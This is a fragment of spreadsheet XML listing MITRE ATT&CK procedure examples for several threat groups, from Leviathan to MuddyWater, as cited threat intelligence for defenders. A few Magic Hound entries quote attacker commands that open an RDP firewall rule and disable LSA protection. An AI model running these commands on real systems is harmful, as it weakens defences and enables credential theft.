    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used stolen code signing certificates to sign malware.(Citation: FireEye Periscope March 2018)(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has collected compromised credentials to use for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used a DLL known as SeDll to decrypt and execute other JavaScript backdoors.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has established domains that impersonate legitimate entities to use for targeting efforts. (Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has infected victims using watering holes.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has utilized OLE as a method to insert malicious content inside various phishing documents. (Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has utilized techniques like reflective DLL loading to write a DLL into memory and load a shell that provides backdoor access to the victim.(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has created new email accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has compromised email accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has exfiltrated data over its C2 channel.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has exploited multiple Microsoft Office and .NET vulnerabilities for execution, including CVE-2017-0199, CVE-2017-8759, and CVE-2017-11882.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used external remote services such as virtual private networks (VPN) to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has downloaded additional scripts and files from adversary-controlled servers.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has conducted internal spearphishing within the victim's environment for lateral movement.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including ProcDump and WCE.(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used C:\Windows\Debug and C:\Perflogs as staging directories.(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing attachments attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing email links attempting to get a user to click.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used multi-hop proxies to disguise the source of their malicious traffic.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used publicly available tools to dump password hashes, including [HOMEFRY](https://attack.mitre.org/software/S0232).(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has obfuscated code using base64 and gzip compression.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has received C2 instructions from user profiles created on legitimate websites such as Github and TechNet.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used PowerShell for execution.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used protocol tunneling to further conceal C2 communications and infrastructure.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used JavaScript to create a shortcut file in the Startup folder that points to its main backdoor.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used regsvr32 for execution.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has staged data remotely prior to exfiltration.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Leviathan](https://attack.mitre.org/groups/G0065) has targeted RDP credentials and used it to move through the victim environment.(Citation: FireEye APT40 March 2019) </t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) used ssh for internal reconnaissance.(Citation: FireEye APT40 March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has compromised social media accounts to conduct social engineering attacks.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has created new social media accounts for targeting efforts.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has sent spearphishing emails with links, often using a fraudulent lookalike domain and stolen branding.(Citation: Proofpoint Leviathan Oct 2017)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used steganography to hide stolen data inside other files stored on Github.(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has obtained valid accounts to gain initial access.(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used VBScript.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) relies on web shells for an initial foothold as well as persistence into the victim's systems.(Citation: FireEye APT40 March 2019)(Citation: CISA AA21-200A APT40 July 2021)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for execution.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[Leviathan](https://attack.mitre.org/groups/G0065) has used WMI for persistence.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has distributed [Machete](https://attack.mitre.org/software/S0409) through a fake blog website.(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has relied on users opening malicious attachments delivered through spearphishing to execute malware.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has has relied on users opening malicious links delivered through spearphishing to execute malware.(Citation: Cylance Machete Mar 2017)(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095)'s [Machete](https://attack.mitre.org/software/S0409) MSI installer has masqueraded as a legitimate Adobe Acrobat Reader installer.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has used msiexec to install the [Machete](https://attack.mitre.org/software/S0409) malware.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) used multiple compiled Python scripts on the victim’s system. [Machete](https://attack.mitre.org/groups/G0095)'s main backdoor [Machete](https://attack.mitre.org/software/S0409) is also written in Python.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has created scheduled tasks to maintain [Machete](https://attack.mitre.org/software/S0409)'s persistence.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve"> [Machete](https://attack.mitre.org/groups/G0095) has delivered spearphishing emails that contain a zipped file with malicious contents.(Citation: Securelist Machete Aug 2014)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has sent phishing emails that contain a link to an external server with ZIP and RAR archives.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has embedded malicious macros within spearphishing attachments to download additional files.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/groups/G0095) has used batch files to initiate additional downloads of malicious files.(Citation: 360 Machete Sep 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Magic Hound](https://attack.mitre.org/groups/G0059) granted compromised email accounts read access to the email boxes of additional targeted accounts. The group then was able to authenticate to the intended victim's OWA (Outlook Web Access) portal and read hundreds of email communications for information on Middle East organizations.(Citation: FireEye APT35 2018) </t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used IRC for C2.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used gzip to archive dumped LSASS process memory and RAR to stage and compress local folders.(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can use a SOAP Web service to communicate with its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has removed mailbox export requests from compromised Exchange servers.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) gathered credentials from two victims that they then attempted to validate across 75 different websites.(Citation: IBM ITG18 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used a web shell to exfiltrate a ZIP file containing a dump of LSASS memory on a compromised machine.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has added the following rule to a victim's Windows firewall to allow RDP traffic - `"netsh" advfirewall firewall add rule name="Terminal Server" dir=in action=allow protocol=TCP localport=3389`.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled antivirus services on targeted systems in order to upload malicious payloads.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used compromised domains to host links targeted to specific phishing victims.(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 July2021)(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has registered fraudulent domains such as "mail-newyorker.com" and "news12.com.recover-session-service.site" to target specific victims with phishing attacks.(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted watering-hole attacks through media and magazine websites.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Powershell to discover email accounts.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised personal email accounts through the use of legitimate credentials and gathered additional victim information.(Citation: IBM ITG18 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has established email accounts using fake personas for spearphishing operations.(Citation: IBM ITG18 2020)(Citation: Proofpoint TA453 March 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired the personal email addresses of some individuals they intend to target.(Citation: Proofpoint TA453 July2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has compromised email credentials in order to steal sensitive data.(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used open-source JNDI exploit kits to exploit Log4j (CVE-2021-44228) and has exploited ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) on MS Exchange servers.(Citation: Check Point APT35 CharmPower January 2022)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has deleted and overwrote files to cover tracks.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list a victim's logical drives and the type, as well the total/free space of the fixed devices. Other malware can list a directory's contents.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired mobile phone numbers of potential targets, possibly for mobile malware or additional phishing operations.(Citation: Proofpoint TA453 July2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has a function to determine whether the C2 server wishes to execute the newly dropped file in a hidden window.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has disabled LSA protection on compromised hosts using `"reg" add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f`.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has downloaded additional code and files from servers onto victims.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware is capable of keylogging.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has stolen domain credentials by dumping LSASS process memory with comsvcs.dll and from a Microsoft Active Directory Domain Controller using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has created a user named `DefaultAccount` on compromised machines and assigned it to the Administrators and Remote Desktop Users groups.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has collected .PST archives.(Citation: FireEye APT35 2018)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious email attachments.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has attempted to lure victims into opening malicious links embedded in emails.(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used the name dllhost.exe to mask a malicious tool used in C2.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has modified Registry settings for security tools.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has communicated with its C2 server over TCP port 4443 using HTTP.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used base64-encoded commands and files, and has also encrypted embedded strings with AES.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used PowerShell for execution and privilege escalation.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can list running processes.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used Registry Run keys to establish persistence.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used Remote Desktop Services on targeted systems.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has exported emails from compromised Exchange servers.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used rundll32.exe to execute MiniDump from comsvcs.dll when dumping LSASS memory.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used scheduled tasks to establish persistence.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware can take a screenshot and upload the file to its C2 server.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has created fake LinkedIn and other social media accounts to contact targets and convince them--through messages and voice communications--to open malicious links.(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has sent malicious URL links through email to victims. In some cases the URLs were shortened or linked to Word documents with malicious macros that executed PowerShells scripts to download [Pupy](https://attack.mitre.org/software/S0192).(Citation: Secureworks Cobalt Gypsy Feb 2017)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Certfa Charming Kitten January 2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used SMS and email messages with links designed to steal credentials.(Citation: Certfa Charming Kitten January 2021)(Citation: ClearSky Kittens Back 3 August 2020)(Citation: Proofpoint TA453 March 2021)(Citation: Proofpoint TA453 July2021)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) used various social media channels (such as LinkedIn) as well as messaging services (such as WhatsApp) to spearphish victims.(Citation: SecureWorks Mia Ash July 2017)(Citation: Microsoft Phosphorus Mar 2019)(Citation: ClearSky Kittens Back 3 August 2020)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used a PowerShell command to check the victim system architecture to determine if it is an x64 machine. Other malware has obtained the OS version, UUID, and computer/host name to send to the C2 server.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware gathers the victim's local IP address, MAC address, and external IP address.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used quser.exe to identify existing RDP connections.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has obtained the victim username and sent it to the C2 server.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has obtained and used open-source penetration testing tools like [Havij](https://attack.mitre.org/software/S0224), [sqlmap](https://attack.mitre.org/software/S0225), Metasploit, and [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Check Point Rocket Kitten)(Citation: FireEye APT35 2018)(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used VBS scripts for execution.(Citation: Unit 42 Magic Hound Feb 2017)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has conducted widespread scanning to identify public-facing systems vulnerable to Log4j (CVE-2021-44228).(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used HTTP for C2.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has acquired Amazon S3 buckets to use in C2.(Citation: Check Point APT35 CharmPower January 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used multiple web shells to gain execution.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used the command-line interface.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Magic Hound](https://attack.mitre.org/groups/G0059) has used a tool to run `cmd /c wmic computersystem get domain` for discovery.(Citation: DFIR Report APT35 ProxyShell March 2022)</t>
  </si>
  <si>
    <t>[Moafee](https://attack.mitre.org/groups/G0002) has been known to employ binary padding.(Citation: Haq 2014)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103)'s malicious spearphishing attachments required a user to open the file after receiving.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103)'s spearphishing emails required a user to click the link to connect to a compromised website.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103) has compressed the [ShimRat](https://attack.mitre.org/software/S0444) executable within malicious email attachments. [Mofang](https://attack.mitre.org/groups/G0103) has also encrypted payloads before they are downloaded to victims.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious documents, PDFs, or Excel files attached.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Mofang](https://attack.mitre.org/groups/G0103) delivered spearphishing emails with malicious links included.(Citation: FOX-IT May 2016 Mofang)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has used forged Microsoft code-signing certificates on malware.(Citation: FireEye Operation Molerats)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used the public tool BrowserPasswordDump10 to dump passwords saved in browsers on victims.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) decompresses ZIP files once on the victim machine.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) used executables to download malicious files from different sources.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with JS, on target machines.(Citation: Kaspersky MoleRATs April 2019)	</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious files via email that tricked users into clicking Enable Content to run an embedded macro and to download malicious archives.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) has sent malicious links via email trick users into opening a RAR archive and running an executable.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Molerats](https://attack.mitre.org/groups/G0021) has used msiexec.exe to execute an MSI payload.(Citation: Unit42 Molerat Mar 2020) </t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has delivered compressed executables within ZIP files to victims.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used PowerShell implants on target machines.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) actors obtained a list of active processes on the victim and sent them to C2 servers.(Citation: DustySky)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) saved malicious files within the AppData and Startup folders to maintain persistence.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has created scheduled tasks to persistently run VBScripts.(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious Microsoft Word and PDF attachments.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)(Citation: Cybereason Molerats Dec 2020)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) has sent phishing emails with malicious links included.(Citation: Kaspersky MoleRATs April 2019)</t>
  </si>
  <si>
    <t>[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with VBScript, on target machines.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used signed drivers from an open source tool called DiskCryptor to evade detection.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can disable the Windows firewall on specific remote machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has exploited known vulnerabilities in public-facing infrastructure such as Microsoft Exchange Servers.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has downloaded and installed web shells to following path &lt;code&gt;C:\inetpub\wwwroot\aspnet_client\system_web\IISpool.aspx&lt;/code&gt;.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the administrator username from a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has built malware, such as [DCSrv](https://attack.mitre.org/software/S1033) and [PyDCrypt](https://attack.mitre.org/software/S1032), for targeting victims' machines.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used obfuscated web shells in their operations.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used batch scripts that can enable SMB on a compromised host.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[Moses Staff](https://attack.mitre.org/groups/G1009) collected information about the infected host, including the machine names and OS architecture.(Citation: Checkpoint MosesStaff Nov 2021)
</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has collected the domain name of a compromised network.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has used the commercial tool DiskCryptor.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[Moses Staff](https://attack.mitre.org/groups/G1009) has dropped a web shell onto a compromised system.(Citation: Checkpoint MosesStaff Nov 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used the native Windows cabinet creation tool, makecab.exe, likely to compress stolen data to be uploaded.(Citation: Symantec MuddyWater Dec 2018)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) has used web services including OneHub to distribute remote access tools.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[MuddyWater](https://attack.mitre.org/groups/G0069) uses various techniques to bypass UAC.(Citation: ClearSky MuddyWater Nov 2018)</t>
  </si>
  <si>
